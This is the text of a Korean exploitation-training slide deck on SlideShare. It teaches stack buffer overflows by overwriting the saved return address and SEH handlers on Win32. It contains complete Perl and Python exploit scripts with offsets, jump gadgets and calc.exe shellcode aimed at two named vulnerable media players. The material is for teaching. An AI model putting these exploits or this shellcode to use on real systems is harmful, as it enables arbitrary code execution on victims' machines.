SlideShare a Scribd company logo

System Hacking Tutorial #2 - Buffer Overflow - Overwrite EIP

sanghwan ahn
sanghwan ahn

This document provides an overview of system hacking and reverse engineering techniques. It introduces various buffer overflow exploitation methods like overwriting the return address, structured exception handling, egg hunting, and return-oriented programming on Windows, Unix-like, and ARM platforms. Specific exploitation steps are demonstrated, such as overwriting the return address in a stack-based buffer overflow to redirect execution to shellcode. The document also provides an example exploit targeting a Windows application vulnerable to a stack-based buffer overflow through crafted playlist files.

1 of 34
Downloaded 103 times
System Hacking & Reverse Engineering documented by h2spice h2spice@gmail.com [ Buffer Overflow - Overwrite EIP ]
Who am I Sanghwan,Ahn (h2spice) Works for LINE.Corp Carrying out research on the vulnerability (exploitation,hunt,analysis)
시스템 해킹 / 리버싱 Buffer Overflow 취약점 원리 Stack Overflow Heap Overflow Format String Bug Heap Overflow Use After Free Overwriting RET Overwriting SEH 익스플로잇(Win32/*NIX/ARM) Egg Hunting RTL ROP Heap Spraying 커리큘럼 소개 취약점 / 악성코드 분석 악성코드 분석 Software on X86 버그 헌팅 X86 ARM Mobile 취약점 분석 소스코드 분석 퍼징 CVE-XXXX-XXXX Exploit-DB Inj3ct0r - 1337day 리버스 엔지니어링 iOS Android Overwriting .dtors Overwriting GOT
목차 커리큘럼 소개 Track3 - Exploitation Introduction Track3-1 Win32 Overwrite RET Overwrite SEH Egg-Hunting ROP Heap Spray Track3-2 *NIX Overwrite RET RTL Overwrite .dtors Overwrite GOT Track3-3 ARM Overwrite RET RTL ROP
Track3. Exploitation
Track3. Exploitation Introduction Track3-1 Win32 Overwrite RET Overwrite SEH Egg-Hunting ROOriePn( tRede turn Programming) Heap Spray Track3-2 *NIX Overwrite RET Ret-to-LibC Overwrite .dtors Overwrite GOT Track3-3 ARM Overwrite RET Ret-to-LibC ROOriePn t(Rede turn Programming)
Track3. Exploitation Introduction Track3-1 Win32 Overwrite RET Overwrite SEH Egg-Hunting ROOriePn( tRede turn Programming) Heap Spray Track3-2 *NIX Overwrite RET Ret-to-LibC Overwrite .dtors Overwrite GOT Track3-3 ARM Overwrite RET Ret-to-LibC ROOriePn t(Rede turn Programming)
What is the Exploitation ? 익스플로잇 (Exploitation) 이란, 컴퓨터 의 소프트웨어 나 하드웨어 및 컴퓨터 고나련 전자 제품의 버그, 보안 취약점등 설계상의 결함을 이용해 공격자의 의도된 동작을 수행하도록 만들어진 절차나 일련의 명령, 스크립트, 프로그램 또는 특정한 데이터 조각을 말하며, 이러한 것들을 사용한 공격 행위를 의미 공격자가 타깃의 흐름 제어가 (Control Flow) 가능 할 때 부터 진행 보통 특정 버그를 이용하여 취약성을 유발하는 코드와 특정 보안 메커 니즘을 우회하는 코드, 악의적인 동작을 수행하는 코드로 구성 Track3. Exploitation Introduction Track3-1 Win32 Overwrite RET Overwrite SEH Egg-Hunting ROOriePn( tRede turn Programming) Heap Spray Track3-2 *NIX Overwrite RET Ret-to-LibC Overwrite .dtors Overwrite GOT Track3-3 ARM Overwrite RET Ret-to-LibC ROOriePn t(Rede turn Programming)
Overwrite RET (Retrun Address) 스택 버퍼 오버플로우 (Stack Buffer Overflow) 취약성을 이용하여 스 택 영역에 할당된 버퍼의 크기를 초과하는 데이터(공격코드 포함)를 기 록하여 저장된 복구 주소(Return Address)를 공격코드의 주소로 변경 함으로써 임의의 코드를 실행 Track3. Exploitation Introduction Track3-1 Win32 Overwrite RET Overwrite SEH Egg-Hunting ROOriePn( tRede turn Programming) Heap Spray Track3-2 *NIX Overwrite RET Ret-to-LibC Overwrite .dtors Overwrite GOT Track3-3 ARM Overwrite RET Ret-to-LibC ROOriePn t(Rede turn Programming)
How do you fly to shellcode ? 셸 코드(Shell Code)로 이동하는 방법 jmp(or call) [register] : 셸 코드를 가리키는 주소를 레지스터에 넣고, 그 주소를 Return Address에 넣어 셸 코드를 로드할 수 있다. pop return : 셸 코드를 가리키는 주소를 스택에 넣어 놓고 pop/ret 또는 pop/pop/ret (해당 명령이 스택의 어느 위치에 존재하느냐 에 따라 pop의 개수가 달라진다)와 같은 명령을 EIP로 주입함으로써 쉘 코드를 로드 할 수 있다. push return : ‘jmp(or call) [register]’ 와 유사하다. 만약 공격자가 어디에서도 ‘jmp(or call) [register]’ 기계어를 찾을 수 없다면 스택 에 주소를 푸쉬(push)하고 ret 처리하여 셸 코드를 로드할 수 있다. jmp [register + offset] : 셸 코드를 포함하는 버퍼를 가르키는 레지스터가 있지만, 그것이 셸 코드의 시작 위치를 가리키지 않는다면, 공격자는 레 지스터로 가기 위해 필요한 바이트의 덧셈 연산을 하고 jmp [register + offset] 기계어를 통해 셸 코드를 로드할 수 있다. SEH (Error Handler) : 모든 소프트웨어는 OS에 의해 제공되는 예외 처리기를 기본적으로 가지고 있다. 그래서 만약 소프트웨어 자신이 예외 처리를 사용하지 않는다 하더라도, 공격자는 SEH 핸들러를 자신이 원하는 주소로 덮어 씌워, 셸 코드를 로드할 수 있다. Track3. Exploitation Introduction Track3-1 Win32 Overwrite RET Overwrite SEH Egg-Hunting ROOriePn( tRede turn Programming) Heap Spray Track3-2 *NIX Overwrite RET Ret-to-LibC Overwrite .dtors Overwrite GOT Track3-3 ARM Overwrite RET Ret-to-LibC ROOriePn t(Rede turn Programming)
Overwrite RET arg2 arg1 &ret (saved eip) saved ebp char buf[8] Calling .Start function: .Start : push %ebp mov %esp, %ebp sub $0xC, %esp ... strcpy(buf,argv[1]); ... leave ret Track3. Exploitation Introduction Track3-1 Win32 Overwrite RET Overwrite SEH Egg-Hunting ROOriePn( tRede turn Programming) Heap Spray Track3-2 *NIX Overwrite RET Ret-to-LibC Overwrite .dtors Overwrite GOT Track3-3 ARM Overwrite RET Ret-to-LibC ROOriePn t(Rede turn Programming)
Overwrite RET arg2 arg1 &ret (saved eip) saved ebp n w o char buf[8] Calling .Start function: .Start : push %ebp mov %esp, %ebp sub $0xC, %esp ... strcpy(buf,argv[1]); ... leave ret Writing Direction l l e H Track3. Exploitation Introduction Track3-1 Win32 Overwrite RET Overwrite SEH Egg-Hunting ROOriePn( tRede turn Programming) Heap Spray Track3-2 *NIX Overwrite RET Ret-to-LibC Overwrite .dtors Overwrite GOT Track3-3 ARM Overwrite RET Ret-to-LibC ROOriePn t(Rede turn Programming)
Overwrite RET arg2 arg1 A A A A A A A A &ret (saved eip) saved ebp A A A A A A A A A A A A char buf[8] Calling .Start function: .Start : push %ebp mov %esp, %ebp sub $0xC, %esp ... strcpy(buf,argv[1]); ... leave ret Writing Direction A A A A Track3. Exploitation Introduction Track3-1 Win32 Overwrite RET Overwrite SEH Egg-Hunting ROOriePn( tRede turn Programming) Heap Spray Track3-2 *NIX Overwrite RET Ret-to-LibC Overwrite .dtors Overwrite GOT Track3-3 ARM Overwrite RET Ret-to-LibC ROOriePn t(Rede turn Programming)
Overwrite RET arg2 arg1 A A A A Target Address (to Shell Code) &ret (saved eip) saved ebp A A A A A A A A A A A A char buf[8] Calling .Start function: .Start : push %ebp mov %esp, %ebp sub $0xC, %esp ... strcpy(buf,argv[1]); ... leave ret Writing Direction A A A A Track3. Exploitation Introduction Track3-1 Win32 Overwrite RET Overwrite SEH Egg-Hunting ROOriePn( tRede turn Programming) Heap Spray Track3-2 *NIX Overwrite RET Ret-to-LibC Overwrite .dtors Overwrite GOT Track3-3 ARM Overwrite RET Ret-to-LibC ROOriePn t(Rede turn Programming)
Overwrite RET arg2 arg1 &buf(included &ret (saved shell eip) code) Padding saved ebp C o d e char buf[8] Calling .Start function: .Start : push %ebp mov %esp, %ebp sub $0xC, %esp ... strcpy(buf,argv[1]); ... leave ret Writing Direction S h e l l Track3. Exploitation Introduction Track3-1 Win32 Overwrite RET Overwrite SEH Egg-Hunting ROOriePn( tRede turn Programming) Heap Spray Track3-2 *NIX Overwrite RET Ret-to-LibC Overwrite .dtors Overwrite GOT Track3-3 ARM Overwrite RET Ret-to-LibC ROOriePn t(Rede turn Programming)
Exercise Time :D Target Info Win32 Easy RM to MP3 Converter v.2.7.3.700 Download Link is (http://outofcontrol.co.kr/vulnApp/EasyRM.zip) Vulnerability Type Buffer Overflow (Stack Based) by Parsing Playlist Track3. Exploitation Introduction Track3-1 Win32 Overwrite RET Overwrite SEH Egg-Hunting ROOriePn( tRede turn Programming) Heap Spray Track3-2 *NIX Overwrite RET Ret-to-LibC Overwrite .dtors Overwrite GOT Track3-3 ARM Overwrite RET Ret-to-LibC ROOriePn t(Rede turn Programming)
Exercise Time :D Tip Generate Pattern by using mona plugin (!mona pattern_create 30000) nop sleds (0x90 * N) Shell code (windows/exec calc.exe) "xdbxc0x31xc9xbfx7cx16x70xccxd9x74x24xf4xb1" . "x1ex58x31x78x18x83xe8xfcx03x78x68xf4x85x30" . "x78xbcx65xc9x78xb6x23xf5xf3xb4xaex7dx02xaa" . "x3ax32x1cxbfx62xedx1dx54xd5x66x29x21xe7x96" . "x60xf5x71xcax06x35xf5x14xc7x7cxfbx1bx05x6b" . "xf0x27xddx48xfdx22x38x1bxa2xe8xc3xf7x3bx7a" . "xcfx4cx4fx23xd3x53xa4x57xf7xd8x3bx83x8ex83" . "x1fx57x53x64x51xa1x33xcdxf5xc6xf5xc1x7ex98" . "xf5xaaxf1x05xa8x26x99x3dx3bxc0xd9xfex51x61" . "xb6x0ex2fx85x19x87xb7x78x2fx59x90x7bxd7x05" . "x7fxe8x7bxca"; Track3. Exploitation Introduction Track3-1 Win32 Overwrite RET Overwrite SEH Egg-Hunting ROOriePn( tRede turn Programming) Heap Spray Track3-2 *NIX Overwrite RET Ret-to-LibC Overwrite .dtors Overwrite GOT Track3-3 ARM Overwrite RET Ret-to-LibC ROOriePn t(Rede turn Programming)
Exercise Time :D Exploit Info .m3u Playlist File Format length of junk data is 26037 gadget is 0x7608fcfe (From jmp esp MSRMCcodec02.dll) Track3. Exploitation Introduction Track3-1 Win32 Overwrite RET Overwrite SEH Egg-Hunting ROOriePn( tRede turn Programming) Heap Spray Track3-2 *NIX Overwrite RET Ret-to-LibC Overwrite .dtors Overwrite GOT Track3-3 ARM Overwrite RET Ret-to-LibC ROOriePn t(Rede turn Programming)
Exercise Time :D Exploit Code (exploit.pl) my $file= "exploit.m3u"; my $junk= "A" x 26037; my $eip = pack('V',0x7608fcfe); #jmp esp from MSRMCcodec02.dll my $shellcode = "x90" x 25; # windows/exec - 144 bytes # http://www.metasploit.com # Encoder: x86/shikata_ga_nai # EXITFUNC=seh, CMD=calc $shellcode = $shellcode . "xdbxc0x31xc9xbfx7cx16x70xccxd9x74x24xf4xb1" . "x1ex58x31x78x18x83xe8xfcx03x78x68xf4x85x30" . "x78xbcx65xc9x78xb6x23xf5xf3xb4xaex7dx02xaa" . "x3ax32x1cxbfx62xedx1dx54xd5x66x29x21xe7x96" . "x60xf5x71xcax06x35xf5x14xc7x7cxfbx1bx05x6b" . "xf0x27xddx48xfdx22x38x1bxa2xe8xc3xf7x3bx7a" . "xcfx4cx4fx23xd3x53xa4x57xf7xd8x3bx83x8ex83" . "x1fx57x53x64x51xa1x33xcdxf5xc6xf5xc1x7ex98" . "xf5xaaxf1x05xa8x26x99x3dx3bxc0xd9xfex51x61" . "xb6x0ex2fx85x19x87xb7x78x2fx59x90x7bxd7x05" . "x7fxe8x7bxca"; open($FILE,">$file"); print $FILE $junk.$eip.$shellcode; close($FILE); print "m3u File Created successfullyn"; Track3. Exploitation Introduction Track3-1 Win32 Overwrite RET Overwrite SEH Egg-Hunting ROOriePn( tRede turn Programming) Heap Spray Track3-2 *NIX Overwrite RET Ret-to-LibC Overwrite .dtors Overwrite GOT Track3-3 ARM Overwrite RET Ret-to-LibC ROOriePn t(Rede turn Programming)
Overwrite SEH (Error Handler) 구조적 예외 처리 핸들러(SEH:Structured Exception Handler) 윈도우에서 제공하는 예외 처리 방식 exeception handler 사용 Track3. Exploitation Introduction Track3-1 Win32 Overwrite RET Overwrite SEH Egg-Hunting ROOriePn( tRede turn Programming) Heap Spray Track3-2 *NIX Overwrite RET Ret-to-LibC Overwrite .dtors Overwrite GOT Track3-3 ARM Overwrite RET Ret-to-LibC ROOriePn t(Rede turn Programming)
Exception Handler 예외 핸들러(Exception Handler)는 애플리케이션의 예외 발생에 대처하는 목적을 가진 애플리케이션 내부 조각들을 의미한다 (일반적인 예외 처리 메커니즘은 아래 참고) try { // run stuff. if an exception occurs, go to <catch> code } catch { // run stuff when exception occurs } Track3. Exploitation Introduction Track3-1 Win32 Overwrite RET Overwrite SEH Egg-Hunting ROOriePn( tRede turn Programming) Heap Spray Track3-2 *NIX Overwrite RET Ret-to-LibC Overwrite .dtors Overwrite GOT Track3-3 ARM Overwrite RET Ret-to-LibC ROOriePn t(Rede turn Programming)
Exception Handler high address Exception Handler Arguments Return Address Stack Frame Pointer Local Variables (buffer area) low address try { // run stuff. if an exception occurs, go to <catch> code } catch { // run stuff when exception occurs } Track3. Exploitation Introduction Track3-1 Win32 Overwrite RET Overwrite SEH Egg-Hunting ROOriePn( tRede turn Programming) Heap Spray Track3-2 *NIX Overwrite RET Ret-to-LibC Overwrite .dtors Overwrite GOT Track3-3 ARM Overwrite RET Ret-to-LibC ROOriePn t(Rede turn Programming)
Exception Handler 예외 핸들러 (Exception Handler) 는 두가지 포인터를 가진다 다음 Exception Handler 구조체를 가리키는 포인터 예외 핸들러의 실제 주소를 가리키는 포인터 (SE Handler) high address Exception Handler Arguments Return Address Stack Frame Pointer Local Variables (buffer area) low address Exception Handler Next Exception Handler Address Exception Handler Address Track3. Exploitation Introduction Track3-1 Win32 Overwrite RET Overwrite SEH Egg-Hunting ROOriePn( tRede turn Programming) Heap Spray Track3-2 *NIX Overwrite RET Ret-to-LibC Overwrite .dtors Overwrite GOT Track3-3 ARM Overwrite RET Ret-to-LibC ROOriePn t(Rede turn Programming)
Exception Handler Exception Handler #1 Next Exception Handler Address Exception Handler Address Exception Handler #2 Next Exception Handler Address Exception Handler Address Exception Handler #3 Next Exception Handler Address Exception Handler Address MSVCRT! exhandler 0xFFFFFFFF Exception Handler Address Occurs Exception Terminated Track3. Exploitation Introduction Track3-1 Win32 Overwrite RET Overwrite SEH Egg-Hunting ROOriePn( tRede turn Programming) Heap Spray Track3-2 *NIX Overwrite RET Ret-to-LibC Overwrite .dtors Overwrite GOT Track3-3 ARM Overwrite RET Ret-to-LibC ROOriePn t(Rede turn Programming)
high address pointer to next SEH record pointer to SEH Handler Arguments Return Address Stack Frame Pointer Local Variables (buffer area) low address Calling .Start function: .Start : push %ebp mov %esp, %ebp sub $0xC, %esp ... strcpy(buf,argv[1]); ... leave ret Writing Direction Track3. Exploitation Overwrite SEH Introduction Track3-1 Win32 Overwrite RET Overwrite SEH Egg-Hunting ROOriePn( tRede turn Programming) Heap Spray Track3-2 *NIX Overwrite RET Ret-to-LibC Overwrite .dtors Overwrite GOT Track3-3 ARM Overwrite RET Ret-to-LibC ROOriePn t(Rede turn Programming)
Track3. Exploitation Overwrite SEH high address pointer to next SEH record pointer to SEH Handler Arguments Return Address Stack Frame Pointer Local Variables (buffer area) low address Calling .Start function: .Start : push %ebp mov %esp, %ebp sub $0xC, %esp ... strcpy(buf,argv[1]); ... leave ret Writing Direction A A A A A A A A Introduction Track3-1 Win32 Overwrite RET Overwrite SEH Egg-Hunting ROOriePn( tRede turn Programming) Heap Spray Track3-2 *NIX Overwrite RET Ret-to-LibC Overwrite .dtors Overwrite GOT Track3-3 ARM Overwrite RET Ret-to-LibC ROOriePn t(Rede turn Programming)
Track3. Exploitation Overwrite SEH high address A A A A pointer to next SEH record pointer to SEH Handler A A A A Arguments Return Address Stack Frame Pointer Local Variables (buffer area) A A A A A A A A A A A A low address Calling .Start function: .Start : push %ebp mov %esp, %ebp sub $0xC, %esp ... strcpy(buf,argv[1]); ... leave ret Writing Direction A A A A A A A A Introduction Track3-1 Win32 Overwrite RET Overwrite SEH Egg-Hunting ROOriePn( tRede turn Programming) Heap Spray Track3-2 *NIX Overwrite RET Ret-to-LibC Overwrite .dtors Overwrite GOT Track3-3 ARM Overwrite RET Ret-to-LibC ROOriePn t(Rede turn Programming)
Track3. Exploitation Overwrite SEH high address A A A A pointer to next SEH record pointer to SEH Handler A A A A Arguments Return Address Stack Frame Pointer Local Variables (buffer area) A A A A A A A A A A A A low address Calling .Start function: .Start : push %ebp mov %esp, %ebp sub $0xC, %esp ... strcpy(buf,argv[1]); ... leave ret Writing Direction A A A A A A A A Introduction Track3-1 Win32 Overwrite RET Overwrite SEH Egg-Hunting ROOriePn( tRede turn Programming) Heap Spray Track3-2 *NIX Overwrite RET Ret-to-LibC Overwrite .dtors Overwrite GOT Track3-3 ARM Overwrite RET Ret-to-LibC ROOriePn t(Rede turn Programming)
Overwrite SEH high address jmp to shellcode pointer to next SEH record pointer to SEH Handler pop/pop/ret Arguments Return Address Stack Frame Pointer Local Variables (buffer area) A A A A Padding C o d e A A A A low address Calling .Start function: .Start : push %ebp mov %esp, %ebp sub $0xC, %esp ... strcpy(buf,argv[1]); ... leave ret Writing Direction A A A A S h e l l Track3. Exploitation Introduction Track3-1 Win32 Overwrite RET Overwrite SEH Egg-Hunting ROOriePn( tRede turn Programming) Heap Spray Track3-2 *NIX Overwrite RET Ret-to-LibC Overwrite .dtors Overwrite GOT Track3-3 ARM Overwrite RET Ret-to-LibC ROOriePn t(Rede turn Programming)
Exercise Time :D Target Info Win32 FreeAMP Audio Player v.2.0.7 Download Link is (http://outofcontrol.co.kr/vulnApp/FreeAmp.zip) Vulnerability Type Buffer Overflow (Stack Based) by Parsing Playlist Track3. Exploitation Introduction Track3-1 Win32 Overwrite RET Overwrite SEH Egg-Hunting ROOriePn( tRede turn Programming) Heap Spray Track3-2 *NIX Overwrite RET Ret-to-LibC Overwrite .dtors Overwrite GOT Track3-3 ARM Overwrite RET Ret-to-LibC ROOriePn t(Rede turn Programming)
Exercise Time :D Tip Generate Pattern by using mona plugin (!mona pattern_create 30000 / !mona seh) nop sleds (0x90 * N) Shell code (windows/exec calc.exe) "xdbxc0x31xc9xbfx7cx16x70xccxd9x74x24xf4xb1" . "x1ex58x31x78x18x83xe8xfcx03x78x68xf4x85x30" . "x78xbcx65xc9x78xb6x23xf5xf3xb4xaex7dx02xaa" . "x3ax32x1cxbfx62xedx1dx54xd5x66x29x21xe7x96" . "x60xf5x71xcax06x35xf5x14xc7x7cxfbx1bx05x6b" . "xf0x27xddx48xfdx22x38x1bxa2xe8xc3xf7x3bx7a" . "xcfx4cx4fx23xd3x53xa4x57xf7xd8x3bx83x8ex83" . "x1fx57x53x64x51xa1x33xcdxf5xc6xf5xc1x7ex98" . "xf5xaaxf1x05xa8x26x99x3dx3bxc0xd9xfex51x61" . "xb6x0ex2fx85x19x87xb7x78x2fx59x90x7bxd7x05" . "x7fxe8x7bxca"; Track3. Exploitation Introduction Track3-1 Win32 Overwrite RET Overwrite SEH Egg-Hunting ROOriePn( tRede turn Programming) Heap Spray Track3-2 *NIX Overwrite RET Ret-to-LibC Overwrite .dtors Overwrite GOT Track3-3 ARM Overwrite RET Ret-to-LibC ROOriePn t(Rede turn Programming)
Exercise Time :D Exploit Info .pls Playlist File Format length of junk data is 893 gadget is 0x004027BF (Pop/Pop/Ret From freeamp.exe) Track3. Exploitation Introduction Track3-1 Win32 Overwrite RET Overwrite SEH Egg-Hunting ROOriePn( tRede turn Programming) Heap Spray Track3-2 *NIX Overwrite RET Ret-to-LibC Overwrite .dtors Overwrite GOT Track3-3 ARM Overwrite RET Ret-to-LibC ROOriePn t(Rede turn Programming)
Exercise Time :D Exploit Code (exploit.py) #!/usr/bin/python from struct import pack from time import sleep print ''' FreeAmp 2.0.7 .PLS File Buffer Overflow Exploit by h2spice ''' # windows/exec - 144 bytes # http://www.metasploit.com # Encoder: x86/shikata_ga_nai # EXITFUNC=seh, CMD=calc shellcode =("xdbxc0x31xc9xbfx7cx16x70xccxd9x74x24xf4xb1"+ "x1ex58x31x78x18x83xe8xfcx03x78x68xf4x85x30"+ "x78xbcx65xc9x78xb6x23xf5xf3xb4xaex7dx02xaa"+ "x3ax32x1cxbfx62xedx1dx54xd5x66x29x21xe7x96"+ "x60xf5x71xcax06x35xf5x14xc7x7cxfbx1bx05x6b"+ "xf0x27xddx48xfdx22x38x1bxa2xe8xc3xf7x3bx7a"+ "xcfx4cx4fx23xd3x53xa4x57xf7xd8x3bx83x8ex83"+ "x1fx57x53x64x51xa1x33xcdxf5xc6xf5xc1x7ex98"+ "xf5xaaxf1x05xa8x26x99x3dx3bxc0xd9xfex51x61"+ "xb6x0ex2fx85x19x87xb7x78x2fx59x90x7bxd7x05"+ "x7fxe8x7bxca") buf = ("x41" * 893) buf += ("xebx08x90x90") #nSEH (jmp to shellcode) buf += pack('<L',0x004027BF) #SEH (POP/POP/RETN) buf += ("x90" * 20) buf += shellcode buf += "x41" * (30000-len(buf)) exploit = ('''[playlist] File1=http://'''+buf+''' NumberOfEntries=1 Version=2 ''') print "tt[+]Creating File Exploit.pls..." sleep(1) try: f = open("Exploit.pls","wb") f.write(exploit) f.close() print "tt[+]File Exploit.pls Created." sleep(2) except: print "tt[-]Error in Create file Exploit.pls" sleep(1) Track3. Exploitation Introduction Track3-1 Win32 Overwrite RET Overwrite SEH Egg-Hunting ROOriePn( tRede turn Programming) Heap Spray Track3-2 *NIX Overwrite RET Ret-to-LibC Overwrite .dtors Overwrite GOT Track3-3 ARM Overwrite RET Ret-to-LibC ROOriePn t(Rede turn Programming)
Thank You :) See you the week after next week

Recommended

System Hacking Tutorial #1 - Introduction to Vulnerability and Type of Vulner...
System Hacking Tutorial #1 - Introduction to Vulnerability and Type of Vulner...System Hacking Tutorial #1 - Introduction to Vulnerability and Type of Vulner...
System Hacking Tutorial #1 - Introduction to Vulnerability and Type of Vulner...
sanghwan ahn
 
System Hacking Tutorial #3 - Buffer Overflow - Egg Hunting
System Hacking Tutorial #3 - Buffer Overflow - Egg HuntingSystem Hacking Tutorial #3 - Buffer Overflow - Egg Hunting
System Hacking Tutorial #3 - Buffer Overflow - Egg Hunting
sanghwan ahn
 
A Stealthy Stealers - Spyware Toolkit and What They Do
A Stealthy Stealers - Spyware Toolkit and What They DoA Stealthy Stealers - Spyware Toolkit and What They Do
A Stealthy Stealers - Spyware Toolkit and What They Do
sanghwan ahn
 
Exploit Research and Development Megaprimer: Win32 Egghunter
Exploit Research and Development Megaprimer: Win32 EgghunterExploit Research and Development Megaprimer: Win32 Egghunter
Exploit Research and Development Megaprimer: Win32 Egghunter
Ajin Abraham
 
Code Vulnerabilities & Attacks
Code Vulnerabilities & AttacksCode Vulnerabilities & Attacks
Code Vulnerabilities & Attacks
Marcus Botacin
 
Return oriented programming (ROP)
Return oriented programming (ROP)Return oriented programming (ROP)
Return oriented programming (ROP)
Pipat Methavanitpong
 
ch6-pv2-device-drivers
ch6-pv2-device-driversch6-pv2-device-drivers
ch6-pv2-device-drivers
yushiang fu
 
Zn task - defcon russia 20
Zn task - defcon russia 20Zn task - defcon russia 20
Zn task - defcon russia 20
DefconRussia
 
04 - I love my OS, he protects me (sometimes, in specific circumstances)
04 - I love my OS, he protects me (sometimes, in specific circumstances)04 - I love my OS, he protects me (sometimes, in specific circumstances)
04 - I love my OS, he protects me (sometimes, in specific circumstances)
Alexandre Moneger
 
Zero bugs found? Hold my beer AFL! how to improve coverage-guided fuzzing and...
Zero bugs found? Hold my beer AFL! how to improve coverage-guided fuzzing and...Zero bugs found? Hold my beer AFL! how to improve coverage-guided fuzzing and...
Zero bugs found? Hold my beer AFL! how to improve coverage-guided fuzzing and...
Maksim Shudrak
 
09 - ROP countermeasures, can we fix this?
09 - ROP countermeasures, can we fix this?09 - ROP countermeasures, can we fix this?
09 - ROP countermeasures, can we fix this?
Alexandre Moneger
 
RISC-V : Berkeley Boot Loader & Proxy Kernelのソースコード解析
RISC-V : Berkeley Boot Loader & Proxy Kernelのソースコード解析RISC-V : Berkeley Boot Loader & Proxy Kernelのソースコード解析
RISC-V : Berkeley Boot Loader & Proxy Kernelのソースコード解析
Mr. Vengineer
 
Fuzzing malware for fun & profit. Applying Coverage-Guided Fuzzing to Find Bu...
Fuzzing malware for fun & profit. Applying Coverage-Guided Fuzzing to Find Bu...Fuzzing malware for fun & profit. Applying Coverage-Guided Fuzzing to Find Bu...
Fuzzing malware for fun & profit. Applying Coverage-Guided Fuzzing to Find Bu...
Maksim Shudrak
 
深入淺出C語言
深入淺出C語言深入淺出C語言
深入淺出C語言
Simen Li
 
Intel Nervana Graph とは?
Intel Nervana Graph とは?Intel Nervana Graph とは?
Intel Nervana Graph とは?
Mr. Vengineer
 
07 - Bypassing ASLR, or why X^W matters
07 - Bypassing ASLR, or why X^W matters07 - Bypassing ASLR, or why X^W matters
07 - Bypassing ASLR, or why X^W matters
Alexandre Moneger
 
Leak kernel pointer by exploiting uninitialized uses in Linux kernel
Leak kernel pointer by exploiting uninitialized uses in Linux kernelLeak kernel pointer by exploiting uninitialized uses in Linux kernel
Leak kernel pointer by exploiting uninitialized uses in Linux kernel
JinbumPark
 
Design and implementation_of_shellcodes
Design and implementation_of_shellcodesDesign and implementation_of_shellcodes
Design and implementation_of_shellcodes
Amr Ali
 
Chromium Sandbox on Linux (NDC Security 2019)
Chromium Sandbox on Linux (NDC Security 2019)Chromium Sandbox on Linux (NDC Security 2019)
Chromium Sandbox on Linux (NDC Security 2019)
Patricia Aas
 
The Anatomy of an Exploit (NDC TechTown 2019)
The Anatomy of an Exploit (NDC TechTown 2019)The Anatomy of an Exploit (NDC TechTown 2019)
The Anatomy of an Exploit (NDC TechTown 2019)
Patricia Aas
 
05 - Bypassing DEP, or why ASLR matters
05 - Bypassing DEP, or why ASLR matters05 - Bypassing DEP, or why ASLR matters
05 - Bypassing DEP, or why ASLR matters
Alexandre Moneger
 
Efficient System Monitoring in Cloud Native Environments
Efficient System Monitoring in Cloud Native EnvironmentsEfficient System Monitoring in Cloud Native Environments
Efficient System Monitoring in Cloud Native Environments
Gergely Szabó
 
Ilfak Guilfanov - Decompiler internals: Microcode [rooted2018]
Ilfak Guilfanov - Decompiler internals: Microcode [rooted2018]Ilfak Guilfanov - Decompiler internals: Microcode [rooted2018]
Ilfak Guilfanov - Decompiler internals: Microcode [rooted2018]
RootedCON
 
BPF / XDP 8월 세미나 KossLab
BPF / XDP 8월 세미나 KossLabBPF / XDP 8월 세미나 KossLab
BPF / XDP 8월 세미나 KossLab
Taeung Song
 
Ctf hello,world!
Ctf hello,world! Ctf hello,world!
Ctf hello,world!
Hacks in Taiwan (HITCON)
 
ROP 輕鬆談
ROP 輕鬆談ROP 輕鬆談
ROP 輕鬆談
hackstuff
 
Advanced cfg bypass on adobe flash player 18 defcon russia 23
Advanced cfg bypass on adobe flash player 18 defcon russia 23Advanced cfg bypass on adobe flash player 18 defcon russia 23
Advanced cfg bypass on adobe flash player 18 defcon russia 23
DefconRussia
 
[ZigBee 嵌入式系統] ZigBee 應用實作 - 使用 TI Z-Stack Firmware
[ZigBee 嵌入式系統] ZigBee 應用實作 - 使用 TI Z-Stack Firmware[ZigBee 嵌入式系統] ZigBee 應用實作 - 使用 TI Z-Stack Firmware
[ZigBee 嵌入式系統] ZigBee 應用實作 - 使用 TI Z-Stack Firmware
Simen Li
 
Dive into exploit development
Dive into exploit developmentDive into exploit development
Dive into exploit development
Payampardaz
 
Advanced procedures in assembly language Full chapter ppt
Advanced procedures in assembly language Full chapter pptAdvanced procedures in assembly language Full chapter ppt
Advanced procedures in assembly language Full chapter ppt
Muhammad Sikandar Mustafa
 

More Related Content

What's hot (20)

04 - I love my OS, he protects me (sometimes, in specific circumstances)
04 - I love my OS, he protects me (sometimes, in specific circumstances)04 - I love my OS, he protects me (sometimes, in specific circumstances)
04 - I love my OS, he protects me (sometimes, in specific circumstances)
Alexandre Moneger
 
Zero bugs found? Hold my beer AFL! how to improve coverage-guided fuzzing and...
Zero bugs found? Hold my beer AFL! how to improve coverage-guided fuzzing and...Zero bugs found? Hold my beer AFL! how to improve coverage-guided fuzzing and...
Zero bugs found? Hold my beer AFL! how to improve coverage-guided fuzzing and...
Maksim Shudrak
 
09 - ROP countermeasures, can we fix this?
09 - ROP countermeasures, can we fix this?09 - ROP countermeasures, can we fix this?
09 - ROP countermeasures, can we fix this?
Alexandre Moneger
 
RISC-V : Berkeley Boot Loader & Proxy Kernelのソースコード解析
RISC-V : Berkeley Boot Loader & Proxy Kernelのソースコード解析RISC-V : Berkeley Boot Loader & Proxy Kernelのソースコード解析
RISC-V : Berkeley Boot Loader & Proxy Kernelのソースコード解析
Mr. Vengineer
 
Fuzzing malware for fun & profit. Applying Coverage-Guided Fuzzing to Find Bu...
Fuzzing malware for fun & profit. Applying Coverage-Guided Fuzzing to Find Bu...Fuzzing malware for fun & profit. Applying Coverage-Guided Fuzzing to Find Bu...
Fuzzing malware for fun & profit. Applying Coverage-Guided Fuzzing to Find Bu...
Maksim Shudrak
 
深入淺出C語言
深入淺出C語言深入淺出C語言
深入淺出C語言
Simen Li
 
Intel Nervana Graph とは?
Intel Nervana Graph とは?Intel Nervana Graph とは?
Intel Nervana Graph とは?
Mr. Vengineer
 
07 - Bypassing ASLR, or why X^W matters
07 - Bypassing ASLR, or why X^W matters07 - Bypassing ASLR, or why X^W matters
07 - Bypassing ASLR, or why X^W matters
Alexandre Moneger
 
Leak kernel pointer by exploiting uninitialized uses in Linux kernel
Leak kernel pointer by exploiting uninitialized uses in Linux kernelLeak kernel pointer by exploiting uninitialized uses in Linux kernel
Leak kernel pointer by exploiting uninitialized uses in Linux kernel
JinbumPark
 
Design and implementation_of_shellcodes
Design and implementation_of_shellcodesDesign and implementation_of_shellcodes
